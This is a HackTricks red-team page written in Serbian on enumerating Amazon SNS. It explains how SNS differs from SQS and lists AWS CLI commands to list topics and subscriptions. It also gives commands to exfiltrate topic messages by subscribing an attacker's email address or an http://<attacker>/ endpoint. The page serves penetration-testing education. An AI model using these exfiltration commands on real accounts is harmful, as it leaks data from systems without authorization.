AWS - SNS Enum

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

SNS

Amazon Simple Notification Service (Amazon SNS) opisan je kao potpuno upravljana usluga za slanje poruka. Podržava i aplikacija-aplikacija (A2A) i aplikacija-osoba (A2P) tipove komunikacije.

Ključne karakteristike za A2A komunikaciju uključuju mehanizme objavljivanja/pretplate (pub/sub). Ovi mehanizmi uvode teme, ključne za omogućavanje visokog protoka, push-bazirane, mnogo-za-mnogo komunikacije. Ova funkcija je veoma korisna u scenarijima koji uključuju distribuirane sisteme, mikroservise i arhitekture serverless događajima vođene događajima. Korišćenjem ovih tema, sistemi koji objavljuju poruke mogu efikasno distribuirati poruke na širok spektar sistema pretplatnika, olakšavajući šablone fanout poruka.

Razlika u odnosu na SQS

SQS je usluga zasnovana na redovima koja omogućava komunikaciju tačka-do-tačka, osiguravajući da poruke obradi jedan potrošač. Nudi isporuku barem jednom, podržava standardne i FIFO redove, i omogućava zadržavanje poruka za ponovne pokušaje i odloženu obradu. S druge strane, SNS je usluga zasnovana na objavljivanju/pretplati, omogućavajući jedan-na-mnogo komunikaciju emitovanjem poruka više pretplatnika istovremeno. Podržava različite krajnje tačke pretplate poput e-pošte, SMS-a, Lambda funkcija i HTTP/HTTPS, i pruža mehanizme filtriranja za ciljanu isporuku poruka. Iako obe usluge omogućavaju razdvajanje komponenti u distribuiranim sistemima, SQS se fokusira na redovnu komunikaciju, a SNS naglašava obrasce komunikacije fan-out vođene događajima.

Enumeracija

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Imajte na umu da ako je tema tipa FIFO, samo pretplatnici koji koriste protokol SQS mogu biti korišćeni (HTTP ili HTTPS ne mogu biti korišćeni).

Takođe, čak i ako --topic-arn sadrži region, pobrinite se da navedete tačan region u --region ili ćete dobiti grešku koja izgleda kao da nemate pristup, ali je zapravo problem u regionu.

Neautentifikovan pristup

AWS - SNS Unauthenticated Enum

Eskalacija privilegija

AWS - SNS Privesc

Post eksploatacija

AWS - SNS Post Exploitation

Upornost

AWS - SNS Persistence

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated